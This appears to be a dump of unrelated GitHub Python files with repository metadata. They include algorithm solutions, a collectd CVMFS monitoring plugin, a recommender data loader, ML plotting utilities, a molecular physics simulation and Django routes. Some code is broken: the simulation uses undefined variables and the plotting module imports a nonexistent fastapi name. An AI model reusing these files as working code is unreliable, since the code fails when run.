src.tag_namespaces()\n assert \"RPC\" not in src.tag_namespaces()\n\n cog_translate(\n raster_ns_meta,\n \"cogeo.tif\",\n deflate_profile,\n forward_ns_tags=True,\n config={\"GDAL_DISABLE_READDIR_ON_OPEN\": \"FALSE\"},\n quiet=True,\n )\n\n with rasterio.Env(GDAL_DISABLE_READDIR_ON_OPEN=\"FALSE\"):\n with rasterio.open(\"cogeo.tif\") as src:\n assert src.tags(ns=\"IMD\")\n assert src.tags(ns=\"RPC\")\n","repo_name":"cogeotiff/rio-cogeo","sub_path":"tests/test_cogeo.py","file_name":"test_cogeo.py","file_ext":"py","file_size_in_byte":26117,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"16"} +{"seq_id":"1425100136","text":"# 2667 단지번호붙이기\n#\nimport sys\ninput = sys.stdin.readline\n\nN = int(input())\nhome = []\nfor i in range(N):\n home.append(list(map(int,input().rstrip())))\n\nvisit = [[0] * N for _ in range(N)]\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\ncnt = 0\nnew = []\nfor i in range(N):\n for j in range(N):\n if not home[i][j] or visit[i][j]:\n continue\n count = 1\n stack = [[i, j]]\n visit[i][j] = 1\n while stack:\n p, q = stack.pop()\n\n for k in range(4):\n x = p + dx[k]\n y = q + dy[k]\n if 0 <= x < N and 0 <= y < N and home[x][y] and not visit[x][y]:\n stack.append([x,y])\n count += 1\n visit[x][y] = 1\n\n new.append(count)\n cnt += 1\n\nprint(cnt)\nnew = sorted(new)\nfor i in new:\n print(i)","repo_name":"hhongjj/Algorithm","sub_path":"BOJ/4.SILVER/S1_2667.py","file_name":"S1_2667.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11003630611","text":"from urllib import parse\n\n\ndef url_decode(url):\n res = parse.unquote(url)\n return res\n\n\ntests = [\n ('http://www.google.bg/search?q=C%23', 'http://www.google.bg/search?q=C#'),\n ('https://mysite.com/show?n%40m3=p3%24h0', 'https://mysite.com/show?n@m3=p3$h0'),\n ('http://url-decoder.com/i%23de%25?id=23', 'http://url-decoder.com/i#de%?id=23'),\n]\n\nfor url, expected in tests:\n result = url_decode(url)\n print(url)\n print(expected, \"|\",result)\n print(expected == result)\n","repo_name":"ivo-bass/web_softuni","sub_path":"web/utils/url_decode.py","file_name":"url_decode.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"16428860371","text":"import collectd\nimport xattr\nimport os\nimport psutil\nimport threading\nimport time\nimport uuid\n\ntry:\n from os import scandir\nexcept ImportError:\n from scandir import scandir\n\nCVMFS_ROOT = '/cvmfs'\nPLUGIN_NAME = 'cvmfs'\n\nCONFIG_DEFAULT_MEMORY = True\nCONFIG_DEFAULT_MOUNTTIME = True\nCONFIG_DEFAULT_INTERVAL = -1\nCONFIG_DEFAULT_MOUNTTIMEOUT = 5\n\nclass CvmfsProbeConfig(object):\n def __init__(self):\n self.repos = []\n self.attributes = []\n self.memory = CONFIG_DEFAULT_MEMORY\n self.mounttime = CONFIG_DEFAULT_MOUNTTIME\n self.mounttimeout = CONFIG_DEFAULT_MOUNTTIMEOUT\n self.interval = CONFIG_DEFAULT_INTERVAL\n self.config_name = uuid.uuid4().hex\n self.verbose = False\n\n def __str__(self):\n return \"CvmfsProbeConfig - Repos: {0} - Attributes: {1} - Memory: {2} - MountTime: {3} - Interval: {4} - ConfigName: {5} - Verbose: {6}\".format(\n self.repos,\n self.attributes,\n self.memory,\n self.mounttime,\n \"%ss\" % self.interval if self.interval > 0 else \"global interval\",\n self.config_name,\n self.verbose\n )\n\n\nclass CvmfsProbe(object):\n def debug(self, msg, verbose=False):\n if verbose:\n collectd.info('{0} plugin: {1}'.format(PLUGIN_NAME, msg))\n\n\n def safe_scandir(self, directory, timeout):\n contents = []\n t = threading.Thread(target=lambda: contents.extend(scandir(directory)))\n t.daemon = True\n t.start()\n t.join(timeout)\n if t.is_alive():\n raise Exception(\"Scandir timed out after {0} seconds\".format(timeout))\n return contents\n\n\n def read_mounttime(self, repo_mountpoint, timeout):\n start = time.time()\n self.safe_scandir(repo_mountpoint, timeout)\n end = time.time()\n # Did we really mount it ?\n try:\n xattr.getxattr(repo_mountpoint, 'user.fqrn') == repo_mountpoint\n return end - start\n except:\n raise Exception(\"Repository was not mounted correctly\")\n\n def read_memory(self, repo_mountpoint):\n repo_pid = int(xattr.getxattr(repo_mountpoint, 'user.pid'))\n process = psutil.Process(repo_pid)\n if callable(getattr(process, \"get_memory_info\", None)):\n return process.get_memory_info()\n else:\n return process.memory_info()\n\n def read(self, config):\n self.debug(\"probing config: {0}\".format((config)), config.verbose)\n val = collectd.Values(plugin=PLUGIN_NAME)\n for repo in config.repos:\n val.plugin_instance = repo\n val.interval = config.interval\n repo_mountpoint = os.path.join(CVMFS_ROOT, repo)\n\n try:\n mounttime = self.read_mounttime(repo_mountpoint, config.mounttimeout)\n if config.mounttime:\n val.dispatch(type='mounttime', values=[mounttime], interval=config.interval)\n val.dispatch(type='mountok', values=[1], interval=config.interval)\n except Exception as e:\n collectd.warning('cvmfs: failed to get MountTime for repo %s: %s' % (repo, e))\n val.dispatch(type='mountok', values=[0], interval=config.interval)\n\n if config.memory:\n try:\n repo_mem = self.read_memory(repo_mountpoint)\n val.dispatch(type='memory', type_instance='rss', values=[repo_mem.rss], interval=config.interval)\n val.dispatch(type='memory', type_instance='vms', values=[repo_mem.vms], interval=config.interval)\n except Exception:\n collectd.warning('cvmfs: failed to get Memory for repo %s' % repo)\n\n for attribute in config.attributes:\n attribute_name = \"user.%s\" % attribute\n try:\n val.dispatch(type=attribute, values=[float(xattr.getxattr(repo_mountpoint, attribute_name))], interval=config.interval)\n except Exception:\n collectd.warning('cvmfs: failed to inspect attribute \"%s\" in repo \"%s\"' % (attribute_name, repo_mountpoint))\n\n\n def str2bool(self, boolstr):\n if boolstr.lower() == 'true':\n return True\n elif boolstr.lower() == 'false':\n return False\n else:\n raise TypeError('Boolean value expected.')\n\n\n def configure(self, conf):\n config = CvmfsProbeConfig()\n for node in conf.children:\n key = node.key.lower()\n if key == 'repo':\n config.repos += node.values\n elif key == 'attribute':\n config.attributes += node.values\n elif key == 'memory':\n try:\n config.memory = self.str2bool(node.values[0])\n except:\n collectd.info(\"cvmfs: Memory value %s is not valid. It must be either True or False\" % (node.values[0]))\n elif key == 'mounttime':\n try:\n config.mounttime = self.str2bool(node.values[0])\n except:\n collectd.info(\"cvmfs: MountTime value %s is not valid. It must be either True or False\" % (node.values[0]))\n elif key == 'mounttimeout':\n config.mounttimeout = int(node.values[0])\n elif key == 'interval':\n config.interval = int(node.values[0])\n elif key == 'verbose':\n config.verbose = self.str2bool(node.values[0])\n\n if config.interval > 0:\n collectd.register_read(callback=self.read, data=config, interval=config.interval, name=config.config_name)\n else:\n collectd.register_read(callback=self.read, data=config, name=config.config_name)\n\n collectd.info(\"cvmfs: configured callback with config: {0}\".format(config))\n\nprobe = CvmfsProbe()\ncollectd.register_config(probe.configure)\n","repo_name":"cvmfs/collectd-cvmfs","sub_path":"src/collectd_cvmfs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"16612272548","text":"from lib2to3.pytree import Base\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom typing import List, Tuple\nimport pickle\nfrom sklearn.base import BaseEstimator\nfrom sklearn.metrics import (\n RocCurveDisplay, roc_auc_score, ConfusionMatrixDisplay\n)\nfrom sklearn.model_selection import GridSearchCV\nfrom fastapi import pipeline_factory\n\ndef get_subplot_dim(num:int)->Tuple[int,int]:\n \"\"\"returns row and column dimensions closest to a square\n\n Args:\n num (int): total number of graphs needed\n\n Returns:\n Tuple[int,int]: (rows,columns) to make a group of subplots square\n \"\"\"\n r = int(np.floor(np.sqrt(num)))\n c = int(np.ceil(num/r))\n return r,c\n\ndef get_second_deriv(continuous_data:pd.Series)->pd.Series:\n \"\"\"Calculates the second derivative at every point in the series\n\n Args:\n continuous_data (pd.Series): Sorted pd.Series of numerical data\n\n Returns:\n pd.Series: A series of calculated second\n derivatives between each point of the input\n \n \"\"\"\n df = continuous_data.rename('x').to_frame()\n df['next'] = df['x'].shift()\n df['prev'] = df['x'].shift(-1)\n return df.apply(\n lambda row:\n row['next']+row['prev'] - 2*row['x'],\n axis=1\n )\n\ndef graph_elbow(loss:pd.Series)->int:\n \"\"\"graphs the elbow of a pd.Series of Kmeans inertias\n to show optimum number of clusters,\n then returns the optimum number of clusters\n\n Args:\n series (pd.Series): A pd.Series of Kmeans inertia at every cluster no.\n\n Returns:\n int: optimal number of clusters\n \"\"\"\n ax = sns.lineplot(x=loss.index,y=loss)\n elbow = get_second_deriv(loss).argmax()+loss.index.min()\n ax.axvline(elbow,0,ax.get_ylim()[1],color='red',**{'alpha':0.5})\n ax.set_xlabel('Parameter')\n ax.set_title(f'Optimal # of Clusters: {elbow}')\n return elbow\n\ndef graph_cv_results(grid_cv:GridSearchCV,x:str,hue:str)->None:\n \"\"\"graphs the cross validation results\n\n Args:\n grid_cv (GridSearchCV): trained sklearn gridsearch object\n x (str): hyperparameter name you want for x axis\n hue (str): another hyperparameter name you want to compare \n \"\"\"\n cvDat = pd.DataFrame(grid_cv.cv_results_)\n cv_tst_score_cols = cvDat.columns[\n cvDat.columns.str.contains('split[0-9]_test_score',regex=True)\n ]\n \n fig, ax = plt.subplots(figsize=(8,8))\n ax = sns.lineplot(\n data=cvDat[[x,hue]].join(\n cvDat.apply(\n lambda row: row[cv_tst_score_cols].to_numpy(),\n axis=1\n ).rename('test_score')\n ).explode('test_score'),\n x=x,y='test_score',hue=hue,ax=ax\n )\n ax.set_title(\n grid_cv.best_params_\n )\n\n return\n\ndef graph_estimator_auc(\n estimators:List[BaseEstimator], data_ls:List[np.ndarray],\n y_test:np.ndarray[int],figsize:Tuple[int,int]=(12,8))->None:\n \"\"\"Graphs the ROC curve of multiple estimators at once in a single plot\n and shows the AUC value\n\n Args:\n estimators (List[BaseEstimator]): list of trained sklearn estimators\n data_ls (List[np.ndarray]): list of test data for each estimator\n y_test (np.ndarray[int]): true labels for test set\n figsize (Tuple[int,int], optional): Figure size. Defaults to (12,8).\n \"\"\"\n r,c = get_subplot_dim(len(estimators))\n fig, ax = plt.subplots(r,c,figsize=figsize)\n for estim, dat, subplot in zip(estimators,data_ls,ax.flatten()):\n RocCurveDisplay.from_estimator(\n estim,dat,y_test,ax=subplot)\n score = str(roc_auc_score(y_test,estim.predict_proba(dat)[:,1]))[:7]\n subplot.set_title(\n f'{estim.__class__.__name__} AUC: {score}'\n )\n plt.tight_layout()\n \ndef graph_estimator_cmat(\n estimators:List[BaseEstimator], data_ls:List[np.ndarray],\n y_test:np.ndarray[int],figsize:Tuple[int,int]=(12,8))->None:\n \"\"\"Graphs the confusion matrix of multiple estimators at once in a \n single plot\n\n Args:\n estimators (List[BaseEstimator]): list of trained sklearn estimators \n data_ls (List[np.ndarray]): list of test data for each estimator\n y_test (np.ndarray[int]): true labels for test set\n figsize (Tuple[int,int], optional): Figure size. Defaults to (12,8).\n \"\"\"\n r,c = get_subplot_dim(len(estimators))\n fig, ax = plt.subplots(r,c,figsize=figsize)\n for estim, dat, subplot in zip(estimators,data_ls,ax.flatten()):\n ConfusionMatrixDisplay.from_estimator(\n estim,dat,y_test,ax=subplot,cmap='bone')\n subplot.set_title(\n f'{estim.__class__.__name__}'\n )\n plt.tight_layout()\n \ndef graph_feat_importance(\n feat_imps:List[np.ndarray],feat_names:List[str])->None:\n \"\"\"graphs the top 10 most important features for each estimator\n\n Args:\n feat_imps (List[np.ndarray]): feature importances of estimator\n feat_names (List[str]): feature names\n \"\"\"\n plt.figure(figsize=(7,6))\n named_imps = pd.Series(\n feat_imps,index=feat_names\n ).sort_values(ascending=False).head(10)\n ax = sns.barplot(x=named_imps,y=named_imps.index)\n ax.set_title('Top 10 Most Important Features')\n \ndef calculate_gain(estimator:BaseEstimator, y_test:np.ndarray[int],\n x_test:np.ndarray[np.number])->pd.Series:\n \"\"\"returns a dataframe that calculates gain\n\n Args:\n estimator (BaseEstimator): trained sklearn estimator\n y_test (np.ndarray[int]): true labels for test set\n x_test (np.ndarray[np.number]): test set features\n\n Returns:\n pd.Series: Series with gain calculated at each decile, where\n each index indicates which decile the gain value is for\n \"\"\"\n ranked_probs = pd.DataFrame(\n {'label':y_test,'prob':estimator.predict_proba(x_test)[:,1]}\n ).sort_values('prob',ascending=False)\n \n ranked_probs['decile'] = np.digitize(\n ranked_probs['prob'],\n np.percentile(ranked_probs['prob'],range(100,-1,-10)),\n right=False\n )\n ranked_probs['decile'] = ranked_probs['decile'].replace(0,1)\n gain = (\n ranked_probs.groupby('decile')['label'].sum()\n .sort_index().cumsum()\n /ranked_probs['label'].sum()\n )\n return gain\n \ndef graph_lift(\n estimator:BaseEstimator, y_test:np.ndarray[int],\n x_test:np.ndarray[np.number],figsize:Tuple[int,int]=(7,6))->None:\n \"\"\"Graphs the lift of the estimator\n\n Args:\n estimator (BaseEstimator): trained sklearn estimator\n y_test (np.ndarray[int]): true labels for test set\n x_test (np.ndarray[np.number]): test set features\n figsize (Tuple[int,int], optional): Figure size. Defaults to (12,8).\n \"\"\"\n gain = calculate_gain(estimator,y_test,x_test)\n lift = gain*10/(gain.index)\n plt.figure(figsize=figsize)\n ax = sns.barplot(x=lift.index,y=lift)\n ax.set_title(f'Lift Chart for {estimator.__class__.__name__}')\n ax.set_ylabel('Lift')\n for i in ax.containers:\n ax.bar_label(i,)\n \ndef graph_gain(estimator:BaseEstimator, y_test:np.ndarray[int],\n x_test:np.ndarray[np.number],figsize:Tuple[int,int]=(7,6))->None:\n \"\"\"Graphs the gain of the estimator\n\n Args:\n estimator (BaseEstimator): trained sklearn estimator\n y_test (np.ndarray[int]): true labels for test set\n x_test (np.ndarray[np.number]): test set features\n figsize (Tuple[int,int], optional): Figure size. Defaults to (12,8).\n \"\"\"\n gain = calculate_gain(estimator,y_test,x_test)\n plt.figure(figsize=figsize)\n ax = sns.lineplot(x=gain.index,y=gain,marker='o')\n ax.set_title(f'Gain Chart for {estimator.__class__.__name__}')\n ax.set_ylabel('Gain')\n \n for gain_val, decile in zip(gain, gain.index):\n ax.annotate(f'({round(gain_val*100,1)})', xy=(decile-0.4,gain_val+0.02))\n \ndef pickle_model(model:object,file_path:str)->None:\n with open(file_path, 'wb') as handle:\n pickle.dump(model, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \ndef load_pickle_model(file_path:str)->object:\n with open(file_path, 'rb') as handle:\n model = pickle.load(handle)\n return model","repo_name":"Jeff-ChenFan-Wang/TelecomChurnAnalysis","sub_path":"graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24277626699","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 14 19:10:01 2021\n\n@author: souma\n\"\"\"\n\n\n# Creating a basic class\nclass Employee:\n # Classes need an init method\n def __init__(self, fname, lname, salary):\n self.fname = fname\n self.lname = lname\n self.salary = salary\n self.email = self.fname.lower() + '.' + self.lname.lower() + \"@company.com\"\n\n def fullname(self):\n return self.fname + \" \" + self.lname\n # Instantiate the class\n\n\nemp_1 = Employee('Soumadiptya', 'Chakraborty', 92000)\nemp_2 = Employee('Surbhi', 'Welekar', 65000)\nprint(emp_1.email)\nprint(emp_1.fullname())\n# Running class method with Instance\nprint(Employee.fullname(emp_2))\n","repo_name":"soumadiptya/Useful_PythonCodes_and_Materials","sub_path":"OOP in Python/OOP Lesson 1- Classes and Instances.py","file_name":"OOP Lesson 1- Classes and Instances.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"4061819491","text":"#Tweaked for visuals\nfrom __future__ import division\n\nfrom visual import *\nfrom visual.graph import * # import graphing features\n\nO=Oxygen=sphere(pos=vector(0,0,0),radius=10*.66e-11, color=color.red)\nH1=Hydrogen1=sphere(pos=vector(95.564e-12,7.2661e-12,0),radius=10*.31e-11)\nH2=Hydrogen2=sphere(pos=vector(-95.564e-12,7.2661e-12,0),radius=10*.31e-11)\nNa=Sodium=sphere(pos=vector(0,-10e-12,195e-12), radius=116e-13, color=color.yellow)\n\n#With a Kick\n#H1=Hydrogen1=sphere(pos=vector(90e-12,7e-12,0),radius=10*.31e-11) \n#H2=Hydrogen2=sphere(pos=vector(-90e-12,7e-12,0),radius=10*.31e-11) \n\nmO=15.99/(6.022e26)\nmH=1.0079/(6.022e26)\nmNa=22.9897/(6.022e26)\nqO=.8\nqH=.4\nqNa=1\nqCl=-1\n\n#Given from experimentation\nk=50\nupp=5e-5\n\npO=mO*vector(0, 0, 0)\npH1=mH*vector(0, 0, 0)\npH2=mH*vector(0, 0, 0)\npNa=mNa*vector(0, 0, 0)\n\n#graph1 = gcurve(color=color.white)\ngraph2 = gcurve(color=color.blue)\n\n#Intramolecular Force Modeled by springs only and intermolecular force modeled by Coulomb only\nke=8.987551e+9\nt=0\ndt=15e-20\n\nwhile t<5e-12:\n t=t+dt\n Fl1=-k*(mag(H1.pos-O.pos)-95.84e-12)*norm(H1.pos-O.pos)\n Fl2=-k*(mag(H2.pos-O.pos)-95.84e-12)*norm(H2.pos-O.pos)\n Fa=upp*(mag(H1.pos-H2.pos)-191.128e-12)*norm(H1.pos-H2.pos)\n FONa=((ke*qO*qNa)/(mag(Na.pos-O.pos))**2)*-norm(Na.pos-O.pos)\n FNaO=-((ke*qO*qNa)/(mag(Na.pos-O.pos))**2)*-norm(Na.pos-O.pos)\n FH1Na=((ke*qNa*qH)/(mag(Na.pos-H1.pos))**2)*-norm(Na.pos-H1.pos)\n FH2Na=((ke*qNa*qH)/(mag(Na.pos-H2.pos))**2)*-norm(Na.pos-H2.pos)\n\n H1.pos=H1.pos+((pH1)/mH)*dt\n H2.pos=H2.pos+((pH2)/mH)*dt\n O.pos=O.pos+((pO)/mO)*dt\n Na.pos=Na.pos+((pNa)/mNa)*dt\n\n pH1=pH1+(Fl1-Fa-FH1Na)*dt\n pH2=pH2+(Fl2+Fa-FH2Na)*dt\n pO=pO+(FH1O+FH2O)*dt\n pNa=pNa+(FONa+FH1Na+FH2Na)*dt\n \n #graph1.plot(pos=(t,mag(H1.pos-O.pos)-95.84e-12))\n graph2.plot(pos=(t,mag(Na.pos-O.pos)-95.84e-12))\n \n","repo_name":"Kinnardian/water-molecule-model","sub_path":"Ion Water Interaction.py","file_name":"Ion Water Interaction.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17191106840","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = 'website'\n\nurlpatterns = [\n url(r'^$',views.index,name='index'),\n url(r'^game/(?P<token>-?[0-9]+)/$',views.gameboard,name='game'),\n url(r'^joingame/$',views.joingame,name='joingame'),\n url(r'^done/$',views.done,name='done'),\n url(r'^server_request/$',views.server_request,name='server_request')\n]\n","repo_name":"EmberCS15/CS348-Network-Lab-Projects","sub_path":"Assign7/othello/website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34874763341","text":"import numpy as np\nfrom collections import defaultdict\n\n\nclass Dataset(object):\n\n def __init__(self, filename):\n self._data = np.load(filename)\n self.train_data = self._data['train_data']\n self.test_data = self._data['test_data'].tolist()\n self._train_index = np.arange(len(self.train_data), dtype=np.uint)\n self._n_users, self._n_items = self.train_data.max(axis=0) + 1\n\n # Neighborhoods\n self.user_items = defaultdict(set)\n self.item_users = defaultdict(set)\n self.item_users_list = defaultdict(list)\n for u, i in self.train_data:\n self.user_items[u].add(i)\n self.item_users[i].add(u)\n # Get a list version so we do not need to perform type casting\n self.item_users_list[i].append(u)\n\n self._max_user_neighbors = max([len(x) for x in self.item_users.values()])\n\n @property\n def train_size(self):\n \"\"\"\n :return: number of examples in training set\n :rtype: int\n \"\"\"\n return len(self.train_data)\n\n @property\n def user_count(self):\n return self._n_users\n\n @property\n def item_count(self):\n return self._n_items\n\n def _sample_item(self):\n \"\"\"\n Draw an item uniformly\n \"\"\"\n return np.random.randint(0, self.item_count)\n\n def _sample_negative_item(self, user_id):\n \"\"\"\n Uniformly sample a negative item\n \"\"\"\n if user_id > self.user_count:\n raise ValueError(\"Trying to sample user id: {} > user count: {}\".format(\n user_id, self.user_count))\n\n n = self._sample_item()\n positive_items = self.user_items[user_id]\n\n if len(positive_items) >= self.item_count:\n raise ValueError(\"The User has rated more items than possible %s / %s\" % (\n len(positive_items), self.item_count))\n while n in positive_items or n not in self.item_users:\n n = self._sample_item()\n return n\n\n def _generate_data(self, neg_count):\n idx = 0\n self._examples = np.zeros((self.train_size*neg_count, 3),\n dtype=np.uint32)\n self._examples[:, :] = 0\n for user_idx, item_idx in self.train_data:\n for _ in range(neg_count):\n neg_item_idx = self._sample_negative_item(user_idx)\n self._examples[idx, :] = [user_idx, item_idx, neg_item_idx]\n idx += 1\n\n def get_data(self, batch_size, neighborhood, neg_count):\n # Allocate inputs\n batch = np.zeros((batch_size, 3), dtype=np.uint32)\n pos_neighbor = np.zeros((batch_size, self._max_user_neighbors), dtype=np.int32)\n pos_length = np.zeros(batch_size, dtype=np.int32)\n neg_neighbor = np.zeros((batch_size, self._max_user_neighbors), dtype=np.int32)\n neg_length = np.zeros(batch_size, dtype=np.int32)\n\n # Shuffle index\n np.random.shuffle(self._train_index)\n\n idx = 0\n for user_idx, item_idx in self.train_data[self._train_index]:\n # TODO: set positive values outside of for loop\n for _ in range(neg_count):\n neg_item_idx = self._sample_negative_item(user_idx)\n batch[idx, :] = [user_idx, item_idx, neg_item_idx]\n\n # Get neighborhood information\n if neighborhood:\n if len(self.item_users[item_idx]) > 0:\n pos_length[idx] = len(self.item_users[item_idx])\n pos_neighbor[idx, :pos_length[idx]] = self.item_users_list[item_idx]\n else:\n # Length defaults to 1\n pos_length[idx] = 1\n pos_neighbor[idx, 0] = item_idx\n\n if len(self.item_users[neg_item_idx]) > 0:\n neg_length[idx] = len(self.item_users[neg_item_idx])\n neg_neighbor[idx, :neg_length[idx]] = self.item_users_list[neg_item_idx]\n else:\n # Length defaults to 1\n neg_length[idx] = 1\n neg_neighbor[idx, 0] = neg_item_idx\n\n idx += 1\n # Yield batch if we filled queue\n if idx == batch_size:\n if neighborhood:\n max_length = max(neg_length.max(), pos_length.max())\n yield batch, pos_neighbor[:, :max_length], pos_length, \\\n neg_neighbor[:, :max_length], neg_length\n pos_length[:] = 1\n neg_length[:] = 1\n else:\n yield batch\n # Reset\n idx = 0\n\n # Provide remainder\n if idx > 0:\n if neighborhood:\n max_length = max(neg_length[:idx].max(), pos_length[:idx].max())\n yield batch[:idx], pos_neighbor[:idx, :max_length], pos_length[:idx], \\\n neg_neighbor[:idx, :max_length], neg_length[:idx]\n else:\n yield batch[:idx]\n","repo_name":"princewen/tensorflow_practice","sub_path":"recommendation/Basic-CMN-Demo/util/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":6427,"dataset":"github-code","pt":"16"} +{"seq_id":"23264545801","text":"import sys\nfrom collections import defaultdict\n\nsys.path.append(\"..\")\nfrom input import Input\n\ndef parse(line):\n if '$' in line:\n return line.split('$ ')[-1].split('cd ')[-1]\n else:\n parts = line.split(' ')[::-1]\n return [parts[0], 0] if parts[1] == 'dir' else [parts[0], int(parts[1])]\n \ndef create_tree(source):\n tree = defaultdict(list)\n prev_node = '~'\n current_node = '/'\n for item in source:\n line = parse(item)\n if isinstance(line, list):\n if line[1] == 0:\n tree[current_node].append(f'{current_node}::{line[0]}')\n else:\n tree[current_node].append(line[1])\n elif line == '/':\n current_node = f'{prev_node}::/'\n elif line == '..':\n current_node = prev_node\n prev_node = '::'.join(prev_node.split('::')[:-1])\n elif line != 'ls':\n prev_node = current_node\n current_node = f'{current_node}::{line}'\n\n return tree\n\ndef get_folder_sizes(source):\n tree = create_tree(source)\n \n while True:\n for k, v in tree.items():\n if isinstance(v, list):\n if all(isinstance(x, int) for x in v):\n tree[k] = sum(v)\n \n for k in list(tree):\n new_value = []\n if isinstance(tree[k], list):\n for x in tree[k]:\n if isinstance(x, str) and isinstance(tree[x], int):\n new_value.append(tree[x])\n else:\n new_value.append(x)\n tree[k] = new_value\n\n if all(isinstance(x, int) for x in tree.values()):\n break\n\n return tree\n\ndef small_folders_total(source):\n return sum(x for x in get_folder_sizes(source).values() if x <= 100000)\n\ndef smallest_deleteable_dir(source, filesystem_total = 70000000, needed_space = 30000000):\n available_space = filesystem_total - get_folder_sizes(source)['~::/']\n deletion_needed = needed_space - available_space\n return next(filter(lambda folder_size: folder_size > deletion_needed, sorted(get_folder_sizes(source).values())))\n\ninput = Input()\n\n# PART ONE\n# print(small_folders_total(input.example))\nprint(small_folders_total(input.puzzle))\n\n# PART TWO\n# print(smallest_deleteable_dir(input.example))\nprint(smallest_deleteable_dir(input.puzzle))\n","repo_name":"peaky76/advent_of_code_2022","sub_path":"day_7/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28805561225","text":"from pathlib import Path\n\nimport pandas as pd\nfrom pandas import DataFrame\n\n\nclass TickerData:\n def __init__(self):\n self.exchanges = [\n (\"nasdaq\", \"nasdaq-listed.csv\"),\n (\"amex\", \"amex-listed.csv\"),\n (\"nyse\", \"nyse-listed.csv\"),\n ]\n\n def load_exchange_tickers_or_given_stocks(self, stocks) -> DataFrame:\n exchange_securities = [s for s in self._extract_data(self.exchanges)]\n exchange_tickers = pd.concat(exchange_securities)\n\n if stocks:\n selected_stocks = stocks.split(\",\")\n exchange_tickers = exchange_tickers[\n exchange_tickers.index.isin(selected_stocks)\n ]\n\n return exchange_tickers\n\n def _extract_data(self, exchanges):\n for exchange, data_file in exchanges:\n df = self._load_from(\"data/{}\".format(data_file))\n df[\"exchange\"] = exchange\n yield df\n\n def _load_from(self, listing_path):\n securities_file = Path.cwd().joinpath(listing_path)\n return pd.read_csv(securities_file, index_col=[\"Symbol\"])\n\n\nticker_data = TickerData()\n","repo_name":"namuan/stock-rider","sub_path":"krider/ticker_data.py","file_name":"ticker_data.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74557564168","text":"#! /usr/bin/python3\n# renameDates.py - rename filenames in cwd with US MM-DD-YYYY\n# date format to EU DD-MM-YYYY.\n\nimport shutil, os, re\n\n# create regex for US MM-DD-YYYY or MM/DD/YYYY pattern\nusDatePattern = re.compile(r\"\"\"^(.*?) # all possible text before the date\n ((0|1)?\\d) # one or two digits for the month (e.g.: 01, 11 or 1)\n (-|\\\\) # separator\n ((0|1|2|3)?\\d) # one or two digits for the day (e.g.: 01, 11, 21, 31 or 1)\n (-|\\\\) # separator\n ((1|2)\\d\\d\\d) # 1YYY to 2YYY for the year\n (.*?)$ # all possible text after the date\n \"\"\", re.VERBOSE) # VERBOSE allow comments and whitespaces\n\n# loop over the files in the cwd\nfor usFilename in os.listdir('.'):\n mo = usDatePattern.search(usFilename)\n \n if not mo:\n continue\n\n # get the different parts of the mo\n beforePart = mo.group(1)\n monthPart = mo.group(2)\n separator1 = mo.group(4)\n dayPart = mo.group(5)\n separator2 = mo.group(7)\n yearPart = mo.group(8)\n afterPart = mo.group(10)\n # ***OBS***\n # (each '(' and ')' defines a group):\n # datePattern = re.compile(r\"\"\"^(1) all text before the date\n # (2 (3) )- one or two digits for the month\n # (4) separator1\n # (5 (6) )- one or two digits for the day\n # (7) separator2\n # (8 (9) ) four digits for the year\n # (10)$ all text after the date\n # \"\"\", re.VERBOSE)\n # ***OBS***\n\n euFilename = beforePart + dayPart + separator1 + monthPart + separator2 + yearPart + afterPart\n # Get the full, absolute file paths.\n absWorkingDir = os.path.abspath('.')\n usFilename = os.path.join(absWorkingDir, usFilename)\n euFilename = os.path.join(absWorkingDir, euFilename)\n\n # Rename the files.\n print('Renaming \"%s\" to \"%s\"...' % (usFilename, euFilename))\n #shutil.move(amerFilename, euroFilename) # uncomment after testing\n","repo_name":"joaopmt/automation-scripts","sub_path":"MyPythonScripts/renameDates.py","file_name":"renameDates.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6403050234","text":"from __future__ import annotations\n\nimport io\nimport sys\nfrom datetime import date, datetime, time, timedelta\nfrom typing import TYPE_CHECKING, no_type_check\n\nimport numpy as np\nimport pandas as pd\nimport pyarrow as pa\nimport pytest\n\nif sys.version_info >= (3, 9):\n import zoneinfo\nelse:\n from backports import zoneinfo\n\nimport polars as pl\nfrom polars.datatypes import DTYPE_TEMPORAL_UNITS, TemporalDataType\nfrom polars.testing import assert_series_equal, verify_series_and_expr_api\n\nif TYPE_CHECKING:\n from polars.internals.type_aliases import TimeUnit\n\n\ndef test_fill_null() -> None:\n dt = datetime.strptime(\"2021-01-01\", \"%Y-%m-%d\")\n s = pl.Series(\"A\", [dt, None])\n\n for fill_val in (dt, pl.lit(dt)):\n out = s.fill_null(fill_val)\n\n assert 